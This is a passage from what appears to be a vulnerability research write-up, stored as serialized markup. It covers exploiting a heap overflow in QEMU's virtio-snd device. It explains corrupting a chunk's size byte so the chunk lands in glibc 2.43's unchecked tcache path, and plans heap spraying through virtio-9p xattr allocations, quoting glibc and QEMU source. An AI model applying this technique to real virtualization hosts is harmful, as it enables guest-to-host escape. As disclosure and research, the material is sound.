size\"",{"type":24,"tag":301,"props":133799,"children":133800},{"style":359},[133801],{"type":30,"value":589},{"type":24,"tag":301,"props":133803,"children":133804},{"class":303,"line":674},[133805],{"type":24,"tag":301,"props":133806,"children":133807},{"emptyLinePlaceholder":16},[133808],{"type":30,"value":341},{"type":24,"tag":301,"props":133810,"children":133811},{"class":303,"line":692},[133812,133817],{"type":24,"tag":301,"props":133813,"children":133814},{"style":314},[133815],{"type":30,"value":133816}," check_inuse_chunk",{"type":24,"tag":301,"props":133818,"children":133819},{"style":359},[133820],{"type":30,"value":133821},"(av, p);\n",{"type":24,"tag":301,"props":133823,"children":133824},{"class":303,"line":3631},[133825],{"type":24,"tag":301,"props":133826,"children":133827},{"emptyLinePlaceholder":16},[133828],{"type":30,"value":341},{"type":24,"tag":301,"props":133830,"children":133831},{"class":303,"line":3639},[133832],{"type":24,"tag":301,"props":133833,"children":133834},{"style":359},[133835],{"type":30,"value":133836}," [...]\n",{"type":24,"tag":32,"props":133838,"children":133839},{},[133840],{"type":30,"value":133841},"The first check verifies that the chunk pointer itself is not misaligned. Since we do not control the pointer, this is not particularly relevant here.",{"type":24,"tag":32,"props":133843,"children":133844},{},[133845,133847,133852,133854,133859,133861,133866,133868,133873],{"type":30,"value":133846},"The next check, however, ensures that the ",{"type":24,"tag":145,"props":133848,"children":133850},{"className":133849},[],[133851],{"type":30,"value":3219},{"type":30,"value":133853}," field is 16-byte aligned. This means that the low byte we overwrite in ",{"type":24,"tag":145,"props":133855,"children":133857},{"className":133856},[],[133858],{"type":30,"value":3219},{"type":30,"value":133860}," must preserve alignment while also avoiding the ",{"type":24,"tag":145,"props":133862,"children":133864},{"className":133863},[],[133865],{"type":30,"value":133114},{"type":30,"value":133867}," bit. Under those constraints, exploiting the bug through ",{"type":24,"tag":145,"props":133869,"children":133871},{"className":133870},[],[133872],{"type":30,"value":3219},{"type":30,"value":133874}," corruption looked very unreliable at first.",{"type":24,"tag":32,"props":133876,"children":133877},{},[133878],{"type":30,"value":133879},"Still, we wanted to check how this behaved in the latest glibc 2.43:",{"type":24,"tag":291,"props":133881,"children":133883},{"code":133882,"language":294,"meta":7,"className":295,"style":7},"void\n__libc_free (void *mem)\n{\n mchunkptr p;\n\n p = mem2chunk (mem);\n\n INTERNAL_SIZE_T size = chunksize (p);\n\n if (__glibc_unlikely (misaligned_chunk (p)))\n return malloc_printerr_tail (\"free(): invalid pointer\");\n\n#if USE_TCACHE\n if (__glibc_likely (size \u003C mp_.tcache_max_bytes))\n {\n [...]\n\n return tcache_put (p, tc_idx);\n }\n",[133884],{"type":24,"tag":145,"props":133885,"children":133886},{"__ignoreMap":7},[133887,133895,133922,133929,133936,133943,133962,133969,133989,133996,134024,134048,134055,134068,134110,134117,134124,134131,134148],{"type":24,"tag":301,"props":133888,"children":133889},{"class":303,"line":304},[133890],{"type":24,"tag":301,"props":133891,"children":133892},{"style":348},[133893],{"type":30,"value":133894},"void\n",{"type":24,"tag":301,"props":133896,"children":133897},{"class":303,"line":320},[133898,133902,133906,133910,133914,133918],{"type":24,"tag":301,"props":133899,"children":133900},{"style":314},[133901],{"type":30,"value":133160},{"type":24,"tag":301,"props":133903,"children":133904},{"style":359},[133905],{"type":30,"value":873},{"type":24,"tag":301,"props":133907,"children":133908},{"style":348},[133909],{"type":30,"value":58352},{"type":24,"tag":301,"props":133911,"children":133912},{"style":385},[133913],{"type":30,"value":431},{"type":24,"tag":301,"props":133915,"children":133916},{"style":369},[133917],{"type":30,"value":47400},{"type":24,"tag":301,"props":133919,"children":133920},{"style":359},[133921],{"type":30,"value":791},{"type":24,"tag":301,"props":133923,"children":133924},{"class":303,"line":335},[133925],{"type":24,"tag":301,"props":133926,"children":133927},{"style":359},[133928],{"type":30,"value":799},{"type":24,"tag":301,"props":133930,"children":133931},{"class":303,"line":344},[133932],{"type":24,"tag":301,"props":133933,"children":133934},{"style":359},[133935],{"type":30,"value":133203},{"type":24,"tag":301,"props":133937,"children":133938},{"class":303,"line":401},[133939],{"type":24,"tag":301,"props":133940,"children":133941},{"emptyLinePlaceholder":16},[133942],{"type":30,"value":341},{"type":24,"tag":301,"props":133944,"children":133945},{"class":303,"line":415},[133946,133950,133954,133958],{"type":24,"tag":301,"props":133947,"children":133948},{"style":359},[133949],{"type":30,"value":133218},{"type":24,"tag":301,"props":133951,"children":133952},{"style":385},[133953],{"type":30,"value":523},{"type":24,"tag":301,"props":133955,"children":133956},{"style":314},[133957],{"type":30,"value":133227},{"type":24,"tag":301,"props":133959,"children":133960},{"style":359},[133961],{"type":30,"value":133232},{"type":24,"tag":301,"props":133963,"children":133964},{"class":303,"line":439},[133965],{"type":24,"tag":301,"props":133966,"children":133967},{"emptyLinePlaceholder":16},[133968],{"type":30,"value":341},{"type":24,"tag":301,"props":133970,"children":133971},{"class":303,"line":447},[133972,133977,133981,133985],{"type":24,"tag":301,"props":133973,"children":133974},{"style":359},[133975],{"type":30,"value":133976}," INTERNAL_SIZE_T size ",{"type":24,"tag":301,"props":133978,"children":133979},{"style":385},[133980],{"type":30,"value":523},{"type":24,"tag":301,"props":133982,"children":133983},{"style":314},[133984],{"type":30,"value":133554},{"type":24,"tag":301,"props":133986,"children":133987},{"style":359},[133988],{"type":30,"value":133273},{"type":24,"tag":301,"props":133990,"children":133991},{"class":303,"line":476},[133992],{"type":24,"tag":301,"props":133993,"children":133994},{"emptyLinePlaceholder":16},[133995],{"type":30,"value":341},{"type":24,"tag":301,"props":133997,"children":133998},{"class":303,"line":495},[133999,134003,134007,134011,134015,134019],{"type":24,"tag":301,"props":134000,"children":134001},{"style":308},[134002],{"type":30,"value":38149},{"type":24,"tag":301,"props":134004,"children":134005},{"style":359},[134006],{"type":30,"value":873},{"type":24,"tag":301,"props":134008,"children":134009},{"style":314},[134010],{"type":30,"value":133749},{"type":24,"tag":301,"props":134012,"children":134013},{"style":359},[134014],{"type":30,"value":873},{"type":24,"tag":301,"props":134016,"children":134017},{"style":314},[134018],{"type":30,"value":133683},{"type":24,"tag":301,"props":134020,"children":134021},{"style":359},[134022],{"type":30,"value":134023}," (p)))\n",{"type":24,"tag":301,"props":134025,"children":134026},{"class":303,"line":504},[134027,134031,134036,134040,134044],{"type":24,"tag":301,"props":134028,"children":134029},{"style":308},[134030],{"type":30,"value":680},{"type":24,"tag":301,"props":134032,"children":134033},{"style":314},[134034],{"type":30,"value":134035}," malloc_printerr_tail",{"type":24,"tag":301,"props":134037,"children":134038},{"style":359},[134039],{"type":30,"value":873},{"type":24,"tag":301,"props":134041,"children":134042},{"style":329},[134043],{"type":30,"value":133713},{"type":24,"tag":301,"props":134045,"children":134046},{"style":359},[134047],{"type":30,"value":589},{"type":24,"tag":301,"props":134049,"children":134050},{"class":303,"line":512},[134051],{"type":24,"tag":301,"props":134052,"children":134053},{"emptyLinePlaceholder":16},[134054],{"type":30,"value":341},{"type":24,"tag":301,"props":134056,"children":134057},{"class":303,"line":592},[134058,134063],{"type":24,"tag":301,"props":134059,"children":134060},{"style":308},[134061],{"type":30,"value":134062},"#if",{"type":24,"tag":301,"props":134064,"children":134065},{"style":314},[134066],{"type":30,"value":134067}," USE_TCACHE\n",{"type":24,"tag":301,"props":134069,"children":134070},{"class":303,"line":619},[134071,134075,134079,134084,134088,134092,134097,134101,134106],{"type":24,"tag":301,"props":134072,"children":134073},{"style":308},[134074],{"type":30,"value":38149},{"type":24,"tag":301,"props":134076,"children":134077},{"style":359},[134078],{"type":30,"value":873},{"type":24,"tag":301,"props":134080,"children":134081},{"style":314},[134082],{"type":30,"value":134083},"__glibc_likely",{"type":24,"tag":301,"props":134085,"children":134086},{"style":359},[134087],{"type":30,"value":133754},{"type":24,"tag":301,"props":134089,"children":134090},{"style":385},[134091],{"type":30,"value":1849},{"type":24,"tag":301,"props":134093,"children":134094},{"style":369},[134095],{"type":30,"value":134096}," mp_",{"type":24,"tag":301,"props":134098,"children":134099},{"style":359},[134100],{"type":30,"value":206},{"type":24,"tag":301,"props":134102,"children":134103},{"style":369},[134104],{"type":30,"value":134105},"tcache_max_bytes",{"type":24,"tag":301,"props":134107,"children":134108},{"style":359},[134109],{"type":30,"value":9381},{"type":24,"tag":301,"props":134111,"children":134112},{"class":303,"line":635},[134113],{"type":24,"tag":301,"props":134114,"children":134115},{"style":359},[134116],{"type":30,"value":35943},{"type":24,"tag":301,"props":134118,"children":134119},{"class":303,"line":643},[134120],{"type":24,"tag":301,"props":134121,"children":134122},{"style":359},[134123],{"type":30,"value":6775},{"type":24,"tag":301,"props":134125,"children":134126},{"class":303,"line":652},[134127],{"type":24,"tag":301,"props":134128,"children":134129},{"emptyLinePlaceholder":16},[134130],{"type":30,"value":341},{"type":24,"tag":301,"props":134132,"children":134133},{"class":303,"line":666},[134134,134138,134143],{"type":24,"tag":301,"props":134135,"children":134136},{"style":308},[134137],{"type":30,"value":46092},{"type":24,"tag":301,"props":134139,"children":134140},{"style":314},[134141],{"type":30,"value":134142}," tcache_put",{"type":24,"tag":301,"props":134144,"children":134145},{"style":359},[134146],{"type":30,"value":134147}," (p, tc_idx);\n",{"type":24,"tag":301,"props":134149,"children":134150},{"class":303,"line":674},[134151],{"type":24,"tag":301,"props":134152,"children":134153},{"style":359},[134154],{"type":30,"value":501},{"type":24,"tag":32,"props":134156,"children":134157},{},[134158,134160,134165],{"type":30,"value":134159},"It is easy to notice that, when taking the tcache path, there are essentially no integrity checks on the ",{"type":24,"tag":145,"props":134161,"children":134163},{"className":134162},[],[134164],{"type":30,"value":3219},{"type":30,"value":134166}," field beyond the basic size-range decision needed to determine whether the chunk fits into tcache. The only explicit check here is that the pointer itself is aligned, which is not something we care about.",{"type":24,"tag":32,"props":134168,"children":134169},{},[134170,134172,134178,134179,134184],{"type":30,"value":134171},"In fact, even the version prior to 2.43 still performed more validation on the tcache path by calling ",{"type":24,"tag":145,"props":134173,"children":134175},{"className":134174},[],[134176],{"type":30,"value":134177},"check_inuse_chunk",{"type":30,"value":873},{"type":24,"tag":145,"props":134180,"children":134182},{"className":134181},[],[134183],{"type":30,"value":131076},{"type":30,"value":7665},{"type":24,"tag":291,"props":134186,"children":134188},{"code":134187,"language":294,"meta":7,"className":295,"style":7},"void\n__libc_free (void *mem)\n{\n mchunkptr p;\n\n p = mem2chunk (mem);\n\n INTERNAL_SIZE_T size = chunksize (p);\n\n if (__glibc_unlikely (misaligned_chunk (p)))\n return malloc_printerr_tail (\"free(): invalid pointer\");\n\n check_inuse_chunk (arena_for_chunk (p), p); // [1]\n\n#if USE_TCACHE\n if (__glibc_likely (size \u003C mp_.tcache_max_bytes && tcache != NULL))\n [...]\n",[134189],{"type":24,"tag":145,"props":134190,"children":134191},{"__ignoreMap":7},[134192,134199,134226,134233,134240,134247,134266,134273,134292,134299,134326,134349,134356,134382,134389,134400,134456],{"type":24,"tag":301,"props":134193,"children":134194},{"class":303,"line":304},[134195],{"type":24,"tag":301,"props":134196,"children":134197},{"style":348},[134198],{"type":30,"value":133894},{"type":24,"tag":301,"props":134200,"children":134201},{"class":303,"line":320},[134202,134206,134210,134214,134218,134222],{"type":24,"tag":301,"props":134203,"children":134204},{"style":314},[134205],{"type":30,"value":133160},{"type":24,"tag":301,"props":134207,"children":134208},{"style":359},[134209],{"type":30,"value":873},{"type":24,"tag":301,"props":134211,"children":134212},{"style":348},[134213],{"type":30,"value":58352},{"type":24,"tag":301,"props":134215,"children":134216},{"style":385},[134217],{"type":30,"value":431},{"type":24,"tag":301,"props":134219,"children":134220},{"style":369},[134221],{"type":30,"value":47400},{"type":24,"tag":301,"props":134223,"children":134224},{"style":359},[134225],{"type":30,"value":791},{"type":24,"tag":301,"props":134227,"children":134228},{"class":303,"line":335},[134229],{"type":24,"tag":301,"props":134230,"children":134231},{"style":359},[134232],{"type":30,"value":799},{"type":24,"tag":301,"props":134234,"children":134235},{"class":303,"line":344},[134236],{"type":24,"tag":301,"props":134237,"children":134238},{"style":359},[134239],{"type":30,"value":133203},{"type":24,"tag":301,"props":134241,"children":134242},{"class":303,"line":401},[134243],{"type":24,"tag":301,"props":134244,"children":134245},{"emptyLinePlaceholder":16},[134246],{"type":30,"value":341},{"type":24,"tag":301,"props":134248,"children":134249},{"class":303,"line":415},[134250,134254,134258,134262],{"type":24,"tag":301,"props":134251,"children":134252},{"style":359},[134253],{"type":30,"value":133218},{"type":24,"tag":301,"props":134255,"children":134256},{"style":385},[134257],{"type":30,"value":523},{"type":24,"tag":301,"props":134259,"children":134260},{"style":314},[134261],{"type":30,"value":133227},{"type":24,"tag":301,"props":134263,"children":134264},{"style":359},[134265],{"type":30,"value":133232},{"type":24,"tag":301,"props":134267,"children":134268},{"class":303,"line":439},[134269],{"type":24,"tag":301,"props":134270,"children":134271},{"emptyLinePlaceholder":16},[134272],{"type":30,"value":341},{"type":24,"tag":301,"props":134274,"children":134275},{"class":303,"line":447},[134276,134280,134284,134288],{"type":24,"tag":301,"props":134277,"children":134278},{"style":359},[134279],{"type":30,"value":133976},{"type":24,"tag":301,"props":134281,"children":134282},{"style":385},[134283],{"type":30,"value":523},{"type":24,"tag":301,"props":134285,"children":134286},{"style":314},[134287],{"type":30,"value":133554},{"type":24,"tag":301,"props":134289,"children":134290},{"style":359},[134291],{"type":30,"value":133273},{"type":24,"tag":301,"props":134293,"children":134294},{"class":303,"line":476},[134295],{"type":24,"tag":301,"props":134296,"children":134297},{"emptyLinePlaceholder":16},[134298],{"type":30,"value":341},{"type":24,"tag":301,"props":134300,"children":134301},{"class":303,"line":495},[134302,134306,134310,134314,134318,134322],{"type":24,"tag":301,"props":134303,"children":134304},{"style":308},[134305],{"type":30,"value":38149},{"type":24,"tag":301,"props":134307,"children":134308},{"style":359},[134309],{"type":30,"value":873},{"type":24,"tag":301,"props":134311,"children":134312},{"style":314},[134313],{"type":30,"value":133749},{"type":24,"tag":301,"props":134315,"children":134316},{"style":359},[134317],{"type":30,"value":873},{"type":24,"tag":301,"props":134319,"children":134320},{"style":314},[134321],{"type":30,"value":133683},{"type":24,"tag":301,"props":134323,"children":134324},{"style":359},[134325],{"type":30,"value":134023},{"type":24,"tag":301,"props":134327,"children":134328},{"class":303,"line":504},[134329,134333,134337,134341,134345],{"type":24,"tag":301,"props":134330,"children":134331},{"style":308},[134332],{"type":30,"value":680},{"type":24,"tag":301,"props":134334,"children":134335},{"style":314},[134336],{"type":30,"value":134035},{"type":24,"tag":301,"props":134338,"children":134339},{"style":359},[134340],{"type":30,"value":873},{"type":24,"tag":301,"props":134342,"children":134343},{"style":329},[134344],{"type":30,"value":133713},{"type":24,"tag":301,"props":134346,"children":134347},{"style":359},[134348],{"type":30,"value":589},{"type":24,"tag":301,"props":134350,"children":134351},{"class":303,"line":512},[134352],{"type":24,"tag":301,"props":134353,"children":134354},{"emptyLinePlaceholder":16},[134355],{"type":30,"value":341},{"type":24,"tag":301,"props":134357,"children":134358},{"class":303,"line":592},[134359,134363,134367,134372,134377],{"type":24,"tag":301,"props":134360,"children":134361},{"style":314},[134362],{"type":30,"value":133816},{"type":24,"tag":301,"props":134364,"children":134365},{"style":359},[134366],{"type":30,"value":873},{"type":24,"tag":301,"props":134368,"children":134369},{"style":314},[134370],{"type":30,"value":134371},"arena_for_chunk",{"type":24,"tag":301,"props":134373,"children":134374},{"style":359},[134375],{"type":30,"value":134376}," (p), p);",{"type":24,"tag":301,"props":134378,"children":134379},{"style":1062},[134380],{"type":30,"value":134381}," // [1]\n",{"type":24,"tag":301,"props":134383,"children":134384},{"class":303,"line":619},[134385],{"type":24,"tag":301,"props":134386,"children":134387},{"emptyLinePlaceholder":16},[134388],{"type":30,"value":341},{"type":24,"tag":301,"props":134390,"children":134391},{"class":303,"line":635},[134392,134396],{"type":24,"tag":301,"props":134393,"children":134394},{"style":308},[134395],{"type":30,"value":134062},{"type":24,"tag":301,"props":134397,"children":134398},{"style":314},[134399],{"type":30,"value":134067},{"type":24,"tag":301,"props":134401,"children":134402},{"class":303,"line":643},[134403,134407,134411,134415,134419,134423,134427,134431,134435,134439,134444,134448,134452],{"type":24,"tag":301,"props":134404,"children":134405},{"style":308},[134406],{"type":30,"value":38149},{"type":24,"tag":301,"props":134408,"children":134409},{"style":359},[134410],{"type":30,"value":873},{"type":24,"tag":301,"props":134412,"children":134413},{"style":314},[134414],{"type":30,"value":134083},{"type":24,"tag":301,"props":134416,"children":134417},{"style":359},[134418],{"type":30,"value":133754},{"type":24,"tag":301,"props":134420,"children":134421},{"style":385},[134422],{"type":30,"value":1849},{"type":24,"tag":301,"props":134424,"children":134425},{"style":369},[134426],{"type":30,"value":134096},{"type":24,"tag":301,"props":134428,"children":134429},{"style":359},[134430],{"type":30,"value":206},{"type":24,"tag":301,"props":134432,"children":134433},{"style":369},[134434],{"type":30,"value":134105},{"type":24,"tag":301,"props":134436,"children":134437},{"style":385},[134438],{"type":30,"value":20977},{"type":24,"tag":301,"props":134440,"children":134441},{"style":359},[134442],{"type":30,"value":134443}," tcache ",{"type":24,"tag":301,"props":134445,"children":134446},{"style":385},[134447],{"type":30,"value":463},{"type":24,"tag":301,"props":134449,"children":134450},{"style":348},[134451],{"type":30,"value":612},{"type":24,"tag":301,"props":134453,"children":134454},{"style":359},[134455],{"type":30,"value":9381},{"type":24,"tag":301,"props":134457,"children":134458},{"class":303,"line":652},[134459],{"type":24,"tag":301,"props":134460,"children":134461},{"style":359},[134462],{"type":30,"value":133836},{"type":24,"tag":32,"props":134464,"children":134465},{},[134466,134468,134473],{"type":30,"value":134467},"This means that as long as we can reliably force the corrupted chunk down the tcache path, we no longer need to worry much about integrity checks on ",{"type":24,"tag":145,"props":134469,"children":134471},{"className":134470},[],[134472],{"type":30,"value":3219},{"type":30,"value":134474},", because on the latest 2.43 glibc they are non-existent.",{"type":24,"tag":2719,"props":134476,"children":134477},{},[],{"type":24,"tag":32,"props":134479,"children":134480},{},[134481,134483,134488,134490,134495,134497,134502,134504,134510],{"type":30,"value":134482},"With that in mind, the idea we settled on was to allocate a chunk whose ",{"type":24,"tag":145,"props":134484,"children":134486},{"className":134485},[],[134487],{"type":30,"value":3219},{"type":30,"value":134489}," field was initially ",{"type":24,"tag":145,"props":134491,"children":134493},{"className":134492},[],[134494],{"type":30,"value":5071},{"type":30,"value":134496},", then trigger the overflow and corrupt only its low byte. If the byte written is at least ",{"type":24,"tag":145,"props":134498,"children":134500},{"className":134499},[],[134501],{"type":30,"value":5264},{"type":30,"value":134503},", the resulting value would correspond to a larger, tcache-eligible, size in range ",{"type":24,"tag":145,"props":134505,"children":134507},{"className":134506},[],[134508],{"type":30,"value":134509},"[0x210, 0x2f0]",{"type":30,"value":134511},". That would let us free the chunk as an oversized entry into the tcache freelist, which we could later reclaim and overlap chunks for a better primitive.",{"type":24,"tag":32,"props":134513,"children":134514},{},[134515],{"type":30,"value":134516},"This approach gives us much better odds of success. In fact, with the stream configuration we use later, we can make this behavior reliable enough to exploit consistently.",{"type":24,"tag":80,"props":134518,"children":134520},{"id":134519},"heap-spraying",[134521],{"type":30,"value":134522},"Heap Spraying",{"type":24,"tag":32,"props":134524,"children":134525},{},[134526,134528,134533],{"type":30,"value":134527},"With that idea in mind, we now need a way to shape the heap so that a ",{"type":24,"tag":145,"props":134529,"children":134531},{"className":134530},[],[134532],{"type":30,"value":5071},{"type":30,"value":134534},"-sized chunk is placed immediately after the vulnerable virtio-snd buffer. In addition, we need to drain any existing entries from the relevant tcache freelist so that it is not full when we later free the corrupted oversized chunk.",{"type":24,"tag":32,"props":134536,"children":134537},{},[134538,134540,134545],{"type":30,"value":134539},"Unfortunately, while virtio-snd does provide some heap spraying primitives through its buffer allocations, they are fairly limited. For example, we could only allocate up to 64 buffers at a time. On top of that, ",{"type":24,"tag":145,"props":134541,"children":134543},{"className":134542},[],[134544],{"type":30,"value":131143},{"type":30,"value":134546}," is a FIFO queue, so we could not control the order in which those buffers were freed - they would always be released in the same order they were inserted.",{"type":24,"tag":32,"props":134548,"children":134549},{},[134550],{"type":30,"value":134551},"For the purposes of this blog post, we therefore enabled another virtio device to help with heap shaping.",{"type":24,"tag":270,"props":134553,"children":134555},{"id":134554},"virtio-9p",[134556],{"type":30,"value":134554},{"type":24,"tag":32,"props":134558,"children":134559},{},[134560,134565],{"type":24,"tag":145,"props":134561,"children":134563},{"className":134562},[],[134564],{"type":30,"value":134554},{"type":30,"value":134566}," is a paravirtualized filesystem device that lets the guest access a directory exported by the host through the 9P protocol. The part that interested us most was its handling of extended attributes, or xattrs.",{"type":24,"tag":32,"props":134568,"children":134569},{},[134570,134572,134578,134580,134586,134587,134593,134595,134600],{"type":30,"value":134571},"Through a ",{"type":24,"tag":145,"props":134573,"children":134575},{"className":134574},[],[134576],{"type":30,"value":134577},"P9_TXATTRCREATE",{"type":30,"value":134579}," request, we can allocate host-side buffers for both the ",{"type":24,"tag":145,"props":134581,"children":134583},{"className":134582},[],[134584],{"type":30,"value":134585},".name",{"type":30,"value":2378},{"type":24,"tag":145,"props":134588,"children":134590},{"className":134589},[],[134591],{"type":30,"value":134592},".value",{"type":30,"value":134594}," fields, with the size of ",{"type":24,"tag":145,"props":134596,"children":134598},{"className":134597},[],[134599],{"type":30,"value":134592},{"type":30,"value":134601}," being directly controlled by the guest.",{"type":24,"tag":291,"props":134603,"children":134605},{"code":134604,"language":294,"meta":7,"className":295,"style":7},"static void coroutine_fn v9fs_xattrcreate(void *opaque)\n{\n int flags, rflags = 0;\n int32_t fid;\n uint64_t size;\n ssize_t err = 0;\n V9fsString name;\n size_t offset = 7;\n V9fsFidState *file_fidp;\n V9fsFidState *xattr_fidp;\n V9fsPDU *pdu = opaque;\n\n v9fs_string_init(&name);\n err = pdu_unmarshal(pdu, offset, \"dsqd\", &fid, &name, &size, &flags);\n if (err \u003C 0) {\n goto out_nofid;\n }\n\n [...]\n\n if (size > P9_XATTR_SIZE_MAX) {\n err = -E2BIG;\n goto out_nofid;\n }\n\n [...]\n\n v9fs_string_init(&xattr_fidp->fs.xattr.name);\n v9fs_string_copy(&xattr_fidp->fs.xattr.name, &name);\n xattr_fidp->fs.xattr.value = g_malloc0(size);\n}\n",[134606],{"type":24,"tag":145,"props":134607,"children":134608},{"__ignoreMap":7},[134609,134651,134658,134682,134695,134706,134731,134739,134764,134781,134797,134823,134830,134851,134917,134941,134954,134961,134968,134975,134982,135002,135023,135034,135041,135048,135055,135062,135111,135167,135212],{"type":24,"tag":301,"props":134610,"children":134611},{"class":303,"line":304},[134612,134616,134620,134625,134630,134634,134638,134642,134647],{"type":24,"tag":301,"props":134613,"children":134614},{"style":348},[134615],{"type":30,"value":752},{"type":24,"tag":301,"props":134617,"children":134618},{"style":348},[134619],{"type":30,"value":757},{"type":24,"tag":301,"props":134621,"children":134622},{"style":359},[134623],{"type":30,"value":134624}," coroutine_fn ",{"type":24,"tag":301,"props":134626,"children":134627},{"style":314},[134628],{"type":30,"value":134629},"v9fs_xattrcreate",{"type":24,"tag":301,"props":134631,"children":134632},{"style":359},[134633],{"type":30,"value":362},{"type":24,"tag":301,"props":134635,"children":134636},{"style":348},[134637],{"type":30,"value":58352},{"type":24,"tag":301,"props":134639,"children":134640},{"style":385},[134641],{"type":30,"value":431},{"type":24,"tag":301,"props":134643,"children":134644},{"style":369},[134645],{"type":30,"value":134646},"opaque",{"type":24,"tag":301,"props":134648,"children":134649},{"style":359},[134650],{"type":30,"value":791},{"type":24,"tag":301,"props":134652,"children":134653},{"class":303,"line":320},[134654],{"type":24,"tag":301,"props":134655,"children":134656},{"style":359},[134657],{"type":30,"value":799},{"type":24,"tag":301,"props":134659,"children":134660},{"class":303,"line":335},[134661,134665,134670,134674,134678],{"type":24,"tag":301,"props":134662,"children":134663},{"style":348},[134664],{"type":30,"value":407},{"type":24,"tag":301,"props":134666,"children":134667},{"style":359},[134668],{"type":30,"value":134669}," flags, rflags ",{"type":24,"tag":301,"props":134671,"children":134672},{"style":385},[134673],{"type":30,"value":523},{"type":24,"tag":301,"props":134675,"children":134676},{"style":466},[134677],{"type":30,"value":685},{"type":24,"tag":301,"props":134679,"children":134680},{"style":359},[134681],{"type":30,"value":492},{"type":24,"tag":301,"props":134683,"children":134684},{"class":303,"line":344},[134685,134690],{"type":24,"tag":301,"props":134686,"children":134687},{"style":348},[134688],{"type":30,"value":134689}," int32_t",{"type":24,"tag":301,"props":134691,"children":134692},{"style":359},[134693],{"type":30,"value":134694}," fid;\n",{"type":24,"tag":301,"props":134696,"children":134697},{"class":303,"line":401},[134698,134702],{"type":24,"tag":301,"props":134699,"children":134700},{"style":348},[134701],{"type":30,"value":62335},{"type":24,"tag":301,"props":134703,"children":134704},{"style":359},[134705],{"type":30,"value":3098},{"type":24,"tag":301,"props":134707,"children":134708},{"class":303,"line":415},[134709,134714,134719,134723,134727],{"type":24,"tag":301,"props":134710,"children":134711},{"style":348},[134712],{"type":30,"value":134713}," ssize_t",{"type":24,"tag":301,"props":134715,"children":134716},{"style":359},[134717],{"type":30,"value":134718}," err ",{"type":24,"tag":301,"props":134720,"children":134721},{"style":385},[134722],{"type":30,"value":523},{"type":24,"tag":301,"props":134724,"children":134725},{"style":466},[134726],{"type":30,"value":685},{"type":24,"tag":301,"props":134728,"children":134729},{"style":359},[134730],{"type":30,"value":492},{"type":24,"tag":301,"props":134732,"children":134733},{"class":303,"line":439},[134734],{"type":24,"tag":301,"props":134735,"children":134736},{"style":359},[134737],{"type":30,"value":134738}," V9fsString name;\n",{"type":24,"tag":301,"props":134740,"children":134741},{"class":303,"line":447},[134742,134746,134751,134755,134760],{"type":24,"tag":301,"props":134743,"children":134744},{"style":348},[134745],{"type":30,"value":3093},{"type":24,"tag":301,"props":134747,"children":134748},{"style":359},[134749],{"type":30,"value":134750}," offset ",{"type":24,"tag":301,"props":134752,"children":134753},{"style":385},[134754],{"type":30,"value":523},{"type":24,"tag":301,"props":134756,"children":134757},{"style":466},[134758],{"type":30,"value":134759}," 7",{"type":24,"tag":301,"props":134761,"children":134762},{"style":359},[134763],{"type":30,"value":492},{"type":24,"tag":301,"props":134765,"children":134766},{"class":303,"line":476},[134767,134772,134776],{"type":24,"tag":301,"props":134768,"children":134769},{"style":359},[134770],{"type":30,"value":134771}," V9fsFidState ",{"type":24,"tag":301,"props":134773,"children":134774},{"style":385},[134775],{"type":30,"value":772},{"type":24,"tag":301,"props":134777,"children":134778},{"style":359},[134779],{"type":30,"value":134780},"file_fidp;\n",{"type":24,"tag":301,"props":134782,"children":134783},{"class":303,"line":495},[134784,134788,134792],{"type":24,"tag":301,"props":134785,"children":134786},{"style":359},[134787],{"type":30,"value":134771},{"type":24,"tag":301,"props":134789,"children":134790},{"style":385},[134791],{"type":30,"value":772},{"type":24,"tag":301,"props":134793,"children":134794},{"style":359},[134795],{"type":30,"value":134796},"xattr_fidp;\n",{"type":24,"tag":301,"props":134798,"children":134799},{"class":303,"line":504},[134800,134805,134809,134814,134818],{"type":24,"tag":301,"props":134801,"children":134802},{"style":359},[134803],{"type":30,"value":134804}," V9fsPDU ",{"type":24,"tag":301,"props":134806,"children":134807},{"style":385},[134808],{"type":30,"value":772},{"type":24,"tag":301,"props":134810,"children":134811},{"style":359},[134812],{"type":30,"value":134813},"pdu ",{"type":24,"tag":301,"props":134815,"children":134816},{"style":385},[134817],{"type":30,"value":523},{"type":24,"tag":301,"props":134819,"children":134820},{"style":359},[134821],{"type":30,"value":134822}," opaque;\n",{"type":24,"tag":301,"props":134824,"children":134825},{"class":303,"line":512},[134826],{"type":24,"tag":301,"props":134827,"children":134828},{"emptyLinePlaceholder":16},[134829],{"type":30,"value":341},{"type":24,"tag":301,"props":134831,"children":134832},{"class":303,"line":592},[134833,134838,134842,134846],{"type":24,"tag":301,"props":134834,"children":134835},{"style":314},[134836],{"type":30,"value":134837}," v9fs_string_init",{"type":24,"tag":301,"props":134839,"children":134840},{"style":359},[134841],{"type":30,"value":362},{"type":24,"tag":301,"props":134843,"children":134844},{"style":385},[134845],{"type":30,"value":556},{"type":24,"tag":301,"props":134847,"children":134848},{"style":359},[134849],{"type":30,"value":134850},"name);\n",{"type":24,"tag":301,"props":134852,"children":134853},{"class":303,"line":619},[134854,134859,134863,134868,134873,134878,134882,134886,134891,134895,134900,134904,134908,134912],{"type":24,"tag":301,"props":134855,"children":134856},{"style":359},[134857],{"type":30,"value":134858}," err ",{"type":24,"tag":301,"props":134860,"children":134861},{"style":385},[134862],{"type":30,"value":523},{"type":24,"tag":301,"props":134864,"children":134865},{"style":314},[134866],{"type":30,"value":134867}," pdu_unmarshal",{"type":24,"tag":301,"props":134869,"children":134870},{"style":359},[134871],{"type":30,"value":134872},"(pdu, offset, ",{"type":24,"tag":301,"props":134874,"children":134875},{"style":329},[134876],{"type":30,"value":134877},"\"dsqd\"",{"type":24,"tag":301,"props":134879,"children":134880},{"style":359},[134881],{"type":30,"value":377},{"type":24,"tag":301,"props":134883,"children":134884},{"style":385},[134885],{"type":30,"value":556},{"type":24,"tag":301,"props":134887,"children":134888},{"style":359},[134889],{"type":30,"value":134890},"fid, ",{"type":24,"tag":301,"props":134892,"children":134893},{"style":385},[134894],{"type":30,"value":556},{"type":24,"tag":301,"props":134896,"children":134897},{"style":359},[134898],{"type":30,"value":134899},"name, 